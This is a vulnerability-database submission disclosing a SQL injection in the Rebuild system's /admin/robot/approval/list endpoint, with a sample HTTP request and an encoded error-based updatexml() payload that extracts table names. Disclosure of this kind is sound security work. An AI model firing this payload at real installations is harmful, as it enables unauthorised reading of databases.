| Title | There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system. |
|---|
| Description | #### Suggested description:
There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system.
sql injection vulnerability exists in rebuild <=3.2.3.
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
#### Vulnerability Type:
SQLi
#### Vendor of Product:
https://github.com/getrebuild/rebuild
#### Affected Product Code Base
<=3.2.3
#### Affected Component:
/admin/robot/approval/list
#### Attack Type:
Remote
#### Vulnerability details:
Request message:
```
GET /admin/robot/approval/list?entity=&q=1&_=1678979432278 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/admin/robot/approvals
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; JSESSIONID=78BDF749546E83FB68398994E888984E; _ga_CC8EXS9BLD=GS1.1.1678979231.2.1.1678979433.0.0.0
Connection: close
```
payload:
```
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+
```
#### References
https://github.com/getrebuild/rebuild
https://github.com/getrebuild/rebuild/issues/594 |
|---|
| Source | ⚠️ https://github.com/getrebuild/rebuild/issues/594 |
|---|
| User | Mechoy (UID 41579) |
|---|
| Submission | 03/17/2023 04:38 (3 years ago) |
|---|
| Moderation | 03/18/2023 21:30 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223381 [Rebuild up to 3.2.3 list queryListOfConfig q sql injection] |
|---|
| Points | 20 |
|---|